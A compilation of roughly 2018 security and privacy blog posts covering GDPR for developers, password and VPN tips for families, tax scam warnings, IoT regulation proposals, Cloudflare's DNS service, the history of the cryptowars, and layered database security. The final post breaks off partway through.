The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizen's personal data or allow EU citizens sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk

Part 3  provides practical application development techniques that can alleviate an application's privacy risk.

Trivia Time: Test Your Family’s Password Safety Knowledge

Strong PasswordPasswords have become critical tools for every citizen of the digital world. Passwords stand between your family’s gold mine of personal data and the entirety of the internet. While most of us have a love-hate relationship with passwords, it’s beneficial to remember they do serve a powerful purpose when created and treated with intention.

But asking your kids to up their password game is like asking them to recite the state capitals — booooring! So, during this first week of May as we celebrate World Password Day, add a dash of fun to the mix. Encourage your family to test their knowledge with some Cybersavvy Trivia.

Want to find out what kind of password would take two centuries to crack? Or, discover the #1 trick thieves use to crack your password? Then take the quiz and see which family member genuinely knows how to create an awesome password.

We’ve come a long way in our understanding of what makes a strong password and the many ways nefarious strangers crack our most brilliant ones. We know that unique passwords are the hardest to crack, but we also know that human nature means we lean toward creating passwords that are also easy to remember. So striking a balance between strong and memorable may be the most prudent challenge to issue to your family this year.

Several foundational principles remain when it comes to creating strong passwords. Share them with your family and friends and take some of the worries out of password strength once and for all.

5 Password Power Principles

  1. Unique = power. A strong password includes numbers, lowercase and uppercase letters, and symbols. The more complicated your password is, the more difficult it will be to crack. Another option is a password that is a Strong Passwordpassphrase only you could know. For instance, look across the room and what do you see? I can see my dog. Only I know her personality; her likes and dislikes. So, a possible password for me might be #BaconDoodle$. You can even throw in a misspelling of your password to increase its strength such as Passwurd4Life. Just be sure to remember your intentional typos if you choose this option.
  2. Diverse = power. Mixing up your passwords for different websites, apps, and accounts can be a hassle to remember but it’s necessary for online security. Try to use different passwords for online accounts so that if one account is compromised, several accounts aren’t put in jeopardy.
  3. Password manager = power. Working in conjunction with our #2 tip, forget about remembering every password for every account. Let a password manager do the hard work for you. A password manager is a tech tool for generating and storing passwords, so you don’t have to. It will also auto-log you onto frequently visited sites.
  4. Private = power. The strongest password is the one that’s kept private. Kids especially like to share passwords as a sign of loyalty between friends. They also share passwords to allow friends to take over their Snapchat streaks if they can’t log on each day. This is an unwise practice that can easily backfire. The most Strong Passwordpowerful password is the one that is kept private.
  5. 2-step verification = power. Use multi-factor (two-step) authentication whenever possible. Multiple login steps can make a huge difference in securing important online accounts. Sometimes the steps can be a password plus a text confirmation or a PIN plus a fingerprint. These steps help keep the bad guys out even if they happen to gain access to your password.

It’s a lot to manage, this digital life but once you’ve got the safety basics down, you can enjoy all the benefits of online life without the worry of your information getting into the wrong hands. So have a fun and stay informed knowing you’ve equipped your family to live their safest online life!

toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Trivia Time: Test Your Family’s Password Safety Knowledge appeared first on McAfee Blogs.

Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botch upgraded to their online banking system, which meant the Spanished owned bank had to shut down their online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than million customer accounts following a breach by hackers, US Sun Trust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US Saks, Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklist China's state-owned firm ZTE, warning UK telecom providers usage of ZTE's equipment could pose a national security risk. Interestingly BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russian of large-scale cyber-campaigns, aimed at compromising vast numbers of the Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated for the second year in a row that the financial services sector was the most targeted by cybercriminals, typically by sophisticated malware i.e. Zeus, TrickBot, Gootkit. NTT Security released their 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.  

A concerning report by the EEF said UK manufacturer IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers already had been the victim of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens to the door cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.


Does Your Family Need a VPN? Here are 3 Reasons it May Be Time

At one time Virtual Private Networks (VPNs) used to be tools exclusive to corporations and techie friends who appeared overly zealous about masking their online activity. However, with data breaches and privacy concerns at an all-time high, VPNs are becoming powerful security tools for anyone who uses digital devices.

What’s a VPN?

A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your activity by encrypting (or scrambling) your data when you connect to the internet from a remote or public location. A VPN allows you to hide your location, IP address, and online activity.

For instance, if you need to send a last-minute tax addendum to your accountant or a legal contract to your office but must use the airport’s public Wi-Fi, a VPN would protect — or create a secure tunnel in which that data can travel —while you are connected to the open network. Or, if your child wants to watch a YouTube or streaming video while on vacation and only has access to the hotel’s Wi-Fi, a VPN would encrypt your child’s data and allow a more secure internet connection. Without a VPN, any online activity — including gaming, social networking, and email — is fair game for hackers since public Wi-Fi lacks encryption.

Why VPNs matter

  • Your family is constantly on the go. If you find yourself conducting a lot of business on your laptop or mobile device, a VPN could be an option for you. Likewise, if you have a high school or college-aged child who likes to take his or her laptop to the library or coffee shop to work, a VPN would protect data sent or received from that location. Enjoy shopping online whenever you feel the urge? A VPN also has the ability to mask your physical location, banking account credentials, and credit card information. If your family shares a data plan like most, connecting to public Wi-Fi has become a data/money-saving habit. However, it’s a habit that puts you at risk of nefarious people eavesdropping, stealing personal information, and even infecting your device. Putting a VPN in place, via a subscription service, could help curb this risk. In addition, a VPN can encrypt conversations via texting apps and help keep private chats and content private.
  • You enjoy connected vacations/travel. It’s a great idea to unplug on vacation but let’s be honest, it’s also fun to watch movies, check in with friends via social media or email, and send Grandma a few pictures. Service to some of your favorite online streaming sites can be interrupted when traveling abroad. A VPN allows you to connect to a proxy server that will access online sites on your behalf and allow a secure and easier connection most anywhere you go.
  • Your family’s data is a big deal. Protecting personal information is a hot topic these days and for good reason. Most everything we do online is being tracked by Internet Service Providers (ISPs). ISPs track us by our individual Internet Protocol (IP) addresses generated by each device that connects to a network. Much like an identification number, each digital device has an IP address which allows it to communicate within the network. A VPN routes your online activity through different IP addresses allowing you remain anonymous. A favorite entry point hackers use to eavesdrop on your online activity is public Wi-Fi and unsecured networks. In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware. Using a VPN cuts cyber crooks off from their favorite watering hole — public Wi-Fi!

As you can see VPNs can give you an extra layer of protection as you surf, share, access, and receive content online. If you look for a VPN product to install on your devices, make sure it’s a product that is trustworthy and easy to use, such as McAfee’s Safe Connect. A robust VPN product will provide bank-grade encryption to ensure your digital data is safe from prying eyes.

toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Does Your Family Need a VPN? Here are 3 Reasons it May Be Time appeared first on McAfee Blogs.

5 Common Sense Security and Privacy IoT Regulations

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

For most of human history, the balance of power in commercial transactions has been heavily weighted in favour of the seller. As the Romans would say, caveat emptor – buyer beware!

However, there is just as long a history of people using their collective power to protect consumers from unscrupulous sellers, whose profits are too often based on externalising their costs which are then borne by the society. Probably the earliest known consumer safety law is found in Hammurabi’s Code nearly 4000 years ago – it is quite a harsh example:

If a builder builds a house for someone, and does not construct it properly, and the house which he built falls in and kills its owner, then that builder shall be put to death.

However, consumer safety laws as we know them today are a relatively new invention. The Consumer Product Safety Act became law in the USA in 1972. The Consumer Protection Act became law in the UK in 1987.

Today’s laws provide for stiff penalties – for example the UK’s CPA makes product safety issues into criminal offenses liable with up to 6 months in prison and unlimited fines. These laws also mandate enforcement agencies to set standards, buy and test products, and to sue sellers and manufacturers.

So if you sell a household device that causes physical harm to someone, you run some serious risks to your business and to your personal freedom. The same is not true if you sell a household device that causes very real financial, psychological, and physical harm to someone by putting their digital security at risk. The same is not true if you sell a household device that causes very real psychological harm, civil rights harm, and sometimes physical harm to someone by putting their privacy rights at risk. In those cases, your worst case risk is currently a slap on the wrist.

This situation may well change at the end of May 2017 when the EU General Data Protection Regulation (GDPR) goes into force across the EU, and for all companies with any presence or doing business in the EU. The GDPR provides two very welcome threats that can be wielded against would-be negligent vendors: the possibility of real fines – up to 2% of worldwide turnover; and a presumption of guilt if there is a breach – it will be up to the vendor to show that they were not negligent.

However, the GDPR does not specifically regulate digital consumer goods – in other words Internet of Things (IoT) “smart” devices. Your average IoT device is a disaster in terms of both security and privacy – as our Mikko Hypponen‘s eponymous Law states: “smart device” = “vulnerable device”, or if you prefer the Fennel Corollary: “smart device” = “vulnerable surveillance device”.

The current IoT market is like the household goods market before consumer safety laws were introduced. This is why I am very happy to see initiatives like the UK government’s proposed Secure by Design: Improving the cyber security of consumer Internet of Things Report. While the report has many issues, there is clearly a need for the addition of serious consumer protection laws in the security and privacy area.

So if the UK proposal does not go far enough, what would I propose as common sense IoT security and privacy regulation? Here are 5 things I think are mandatory for any serious regulation in this area:

  1. Consumer safety laws largely work due to the severe penalties in place for any company (and their directors) who provide consumers with goods that place their safety in danger, as well as the funding and willingness of a governmental consumer protection agency to sue companies on consumers’ behalf. The same rigorous, severe, and funded structure is required for IoT goods that place consumers’ digital and physical security in danger.
  2. The danger to consumers from IoT goods is not only in terms of security, but also in terms of privacy. I believe similar requirements must be put in place for Privacy by Design, including severe penalties for any collecting, storing, and selling (whether directly, or indirectly via profiling for targeting of advertising) of consumers’ personal data if it is not directly required for the correct functioning of the device and service as seen by the consumer.
  3. Similarly, the requirements should include a strict prohibition on any backdoor, including government or law enforcement related, to access user data, usage information, or any form of control over the devices. Additionally, the requirements should include a strict prohibition on vendors providing any such information or control via “gentleman’s agreements” with a governmental or law enforcement agency/representative.
  4. In terms of the requirements for security and privacy, I believe that any requirements specifically written into law will always be outdated and incomplete. Therefore I would mandate independent standards agencies in a similar way to other internet governing standards bodies. A good example is the management of TLS certificate security rules by the CA/Browser Forum.
  5. Requirements must also deal with cases of IoT vendors going out of business or discontinuing devices and/or software updates. There must be a minimum software update duration, and in the case of discontinuation of support, vendors should be required to provide the latest firmware and update tool as Open Source to allow support to be continued by the user or a third party.

Just as there will always be ways for a determined person to hack around any physical or software security controls, people will find ways around any regulations. However, it is still better to attempt to protect vulnerable consumers than to pretend the problem doesn’t exist; or even worse, to blame the users who have no real choice and no possibility to have any kind of informed consent for the very real security and privacy risks they face.

Let’s start somewhere!

Cloudflare Quad 1 DNS is privacy-centric and blazing fast

Cloudflare Quad 1 DNS is privacy-centric and blazing fast

This year I have witnessed too many DNS stories - rising from the Government censorship programs to privacy-centric secure DNS (DNS over TLS) in order to protect the customers' queries from profiling or profiting businesses. There are some DNS which are attempting to block the malicious sites (IBM Quad9 DNS and SafeDNS) while others are trying to give un-restricted access to the world (Google DNS and CISCO OpenDNS) at low or no costs.

Yesterday, I read that Cloudflare has joined the race with it's DNS service (Quad1, or, and before I dig further (#punintended) let me tell you - it's blazing fast! Initially I thought it's a classic April Fool's prank but then Quad1, or or 4/1 made sense. This is not a prank, and it works just as proposed. Now, this blog post shall summarize some speed tests, and highlight why it's best to use Cloudflare Quad1 DNS.

Quad1 DNS Speed Test

To test the query time speeds (in milliseconds or ms), I shall resolve 3 sites:, my girl friend's website and my friend's blog against 4 existing DNS services - Google DNS (, OpenDNS (, SafeDNS (, IBM Quad9 DNS ( and Cloudflare Quad1 (

Website Google DNS OpenDNS IBM Quad9 SafeDNS CloudFlare 158 187 43 238 6 365 476 233 338 3 207 231 178 336 3

Cloudflare Quad 1 DNS is privacy-centric and blazing fast

This looks so unrealistic, that I had to execute these tests again to verify, and these numbers are indeed true.

Privacy and Security with Quad1 DNS

This is the key element that has not been addressed for quite a while. The existing DNS services are slow, but as well store logs and can profile a user based on the domains they query. The existing DNS services run on UDP port 53, and are vulnerable to MITM (man in the middle) kind of attacks. Also, your ISP has visibility in this clear text traffic to sensor or monetize you, if required. In the blogpost last weekend, Matthew Prince, co-founder and CEO of Cloudflare mentioned,

The web should have been encrypted from the beginning. It's a bug it wasn't. We're doing what we can do fix it ... DNS itself is a 35-year-old protocol and it's showing its age. It was never designed with privacy or security in mind.

The Cloudflare Quad1 DNS overcomes this by supporting both DNS over TLS and HTTPS which means you can setup your internal DNS server and then route the queries to Cloudflare DNS over TLS or HTTPS. To address the story behind the Quad1 or choice, Matthew Prince quoted,

But DNS resolvers inherently can't use a catchy domain because they are what have to be queried in order to figure out the IP address of a domain. It's a chicken and egg problem. And, if we wanted the service to be of help in times of crisis like the attempted Turkish coup, we needed something easy enough to remember and spraypaint on walls.

Kudos to Cloudflare for launching this service, and committing to the privacy and security of the end-users in keeping short-lived logs. Cloudflare confirmed that they don't see a need to write customer's IP addresses to the disk, and retain the logs for more than 24 hours.

Cheers and be safe.

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard earned tax refund.

While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and tell potential victims that two certified letters were previously sent and returned as undeliverable. The callers then threaten to arrest if a payment the victim does not immediately pay through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS) system.

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded phone robot or robo calls, or through a phishing email. Bogus IRS robo often politely ask taxpayers to verify their identity over the phone. These robo calls will even alter caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that contain malware that collects data.

To protect yourself stay alert and be wary of any emails from financial groups or government agencies Don’t share any information online, via email, phone or by text. Don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam crooks target human resource departments. In this scenario, a thief sends an email from a fake organization executive. The email is sent to an employee in the payroll or human resources departments, requesting a list of all employees and their Forms W-2.  This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES). 

Using the collected data criminals then attempt to file fraudulent tax returns to claim refunds. Or, they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security Numbers to commit other identity theft related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses/payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim identity, theft be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS to (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.

toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

What Were the CryptoWars ?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you want can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Sharmir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words the cryptography worked by having a magical secret method only known to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However that wasn’t the end of the story. Like in so many cases “justice too long delayed is justice denied”. The internet is becoming systematically protected by encryption in the last two years thanks to the amazing work of LetsEncrypt. However, we have spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack putting many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shakeup since the dawn of the internet and it is just weeks before it comes into force on 25th May. GDPR comes with potentially head-spinning financial penalties for businesses found not complying, so it really is essential for any business which touches EU citizen's personal data, to thoroughly do their privacy rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

An Interview by Timecamp on Data Protection

An Interview by Timecamp on Data Protection

A few months back I was featured in an interview on Data Protection Tips with Timecamp. Only a handful of questions but they are well articultated for any organisation which is proactive & wants to address security in corporations, and their employees' & customers responsibilities.


How do you evaluate people's awareness regarding the need to protect their private data?

This is an exciting question as we have often faced challenges during data protection training on how to evaluate with certainty that a person understood the importance of data security & is not just mugging for the test.

Enterprise Security is as closely related to the systems as with the people interacting with them.

One way to perform evaluations is to include surprise checks and discussions within the teams. A team of security aware individuals are trained and then asked to carry on the tasks of such inspections. For example, if a laptop is found logged-in, and unattended for long, the team confuscates it and submits to a C-level executive (e.g. CIO or COO). As a consultant, I have also worked on an innovative solution of using such awareness questions as "the second level" check while logging into the intranet applications. And, we all are aware of phishing campaigns that management can execute on all employees and measure their receptiveness to such emails. But, it must be followed up with training on how an individual can detect such attack, and what can it can do to avoid falling prey to such scammers in the future. We must understand that while data protection is vital, all the awareness training and assessment should not cause speed bumps in a daily schedule.

These awareness checks must be regularly performed without adding much stress for the employee. More the effort, more the employee would like to either bypass or avoid it. Security teams must work with the employees and support their understanding of data protection.Data protection must function as the inception of understanding security, and not a forced argument.

Do you think that an average user pays enough attention to the issue of data protection?

Data protection is an issue which can only be dealt with a cumulative effort, and though each one of us cares about privacy, few do that collectively within an enterprise.It is critical to understand that security is a culture, not a product. It needs an ongoing commitment to providing a resilient ecosystem for the business. Social engineering is on the rise with phishing attacks, USB drops, fraudulent calls and messages. An employee must understand that their casual approach towards data protection, can bring the whole business to ground zero. And, core business must be cautious when they do data identification and classification. The business must discern the scope of their application, and specify what's the direct/ indirect risk if the data gets breached. Data breach is not only an immediate loss of information but a ripple effect leading to disclosure of the enterprise's inner sanctum.

Now, how close are we to achieving this? Unfortunately, we are far from the point where an "average user" accepts data protection as a cornerstone of success in the world where information in the asset. Businesses consider security as a tollgate which everyone wants to bypass because neither do they like riding with it, nor being assessed by it. Reliable data protection can be achieved when it's not a one-time effort, but the base to build our technology.

Until unless we use the words "security" and "obvious" in the same line, positively, it would always be a challenge which an "average user" would try to deceive than achieve.

Why is the introduction of procedures for the protection of federal information systems and organisations so important?

Policies and procedures are essential for the protection of federal or local information as they harmonise security with usability. We should understand security is a long road, and when we attempt to protect data, it often has its quirks which confuse or discourages an enterprise to evolve. I have witnessed many fortune 500 firms safeguard their assets and getting absorbed in like it's a black hole. They invest millions of dollars and still don't reach par with the scope & requirements. Therefore, it becomes essential to understand the needs of business, the data it handles, and which procedures apply in their range. Now, specifically, procedures help keep the teams aligned in how to implement a technology or a product for the enterprise. Team experts or SME, usually have a telescopic vision in their domain, but a blind eye on the broader defence in depth.Their skills tunnel their view, but a procedure helps them to attain sync with the current security posture, and the projected roadmap. Also, a procedure reduces the probability of error while aligning with a holistic approach towards security. A procedure dictates what and how to do, thereby leaving a minimal margin of misunderstanding in implementing sophisticated security measures.

Are there any automated methods to test the data susceptibility to cyber-attacks, for instance, by the use of frameworks like Metasploit? How reliable are they in comparison to manual audits?

Yes, there are automated methods to perform audits, and to some extent, they are well devised to detect low hanging fruits. In simpler terms, a computerised assessment has three key phases - Information gathering, tool execution to identify issues, report review. Security aware companies and the ones that fall under strict regulations often integrate such tools in their development and staging environments. This CI (continuous integration) keeps the code clean and checks for vulnerabilities and bugs on a regular basis. It also helps smoothen out the errors that might have come in due to using existing code, or outdated functions. On the other side, there are tools which validate the sanity of the production environment and also perform regular checks on the infrastructure and data flows.

Are these automated tools enough? No. They are not "smart" enough to replace manual audits.

They can validate configurations & issues in the software, but they can't evolve with the threat landscape. Manual inspections, on the other hand, provide a peripheral vision while verifying the ecosystem resilience. It is essential to have manual audits, and use the feedback to assess, and even further tune the tools. If you are working in a regulated and well-observed domain like finance, health or data collection - the compliance officer would always rely on manual audits for final assurance. The tools are still there to support, but remember, they are as good as they are programmed and configured to do.

How to present procedures preventing attacks in one's company, e.g., to external customers who demand an adequate level of data protection?

This is a paramount concern, and thanks for asking this. External clients need to "trust you" before they can share data, or plug you into their organisation. The best approach that has worked for me is an assurance by what you have, and how well are you prepared for the worst.> The cyber world is very fragile, and earlier we used to construct "if things go bad ... " but now we say "when things go bad ...".

This means we have accepted the fact that an attack is pertinent if we are dealing with data/ information. Someone is observing to attempt a strike at the right time especially if you are a successful firm. Now, the assurance can be achieved by demonstrating the policies you have in place for Information Security and Enterprise Risk Management. These policies must be supplemented with standards which identify the requirements, wherein the procedures as the how-to document on the implementation. Most of the cases if you have to assure the client on your defence in depth, the security policy, architecture and previous third-party assessment/ audit suffice. In rare cases, a client may ask to perform its assessment of your infrastructure which is at your discretion. I would recommend making sure that your policy handles not only security but also incidence to reflect your preparedness for the breach/ attack.

On the other hand, if your end customers want assurance, you can entirely reflect that by being proactive on your product, blog, media etc. on how dedicated you are in securing their data. For example, the kind of authentication you support tells whether your commitment to protecting the vault. Whether it's mandated or not depends on the usability and UI, but to allow support shows your commitment to addressing the security-aware customers & understanding the need for the hour.

Published at with special thanks to Ola Rybacka for this opportunity.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
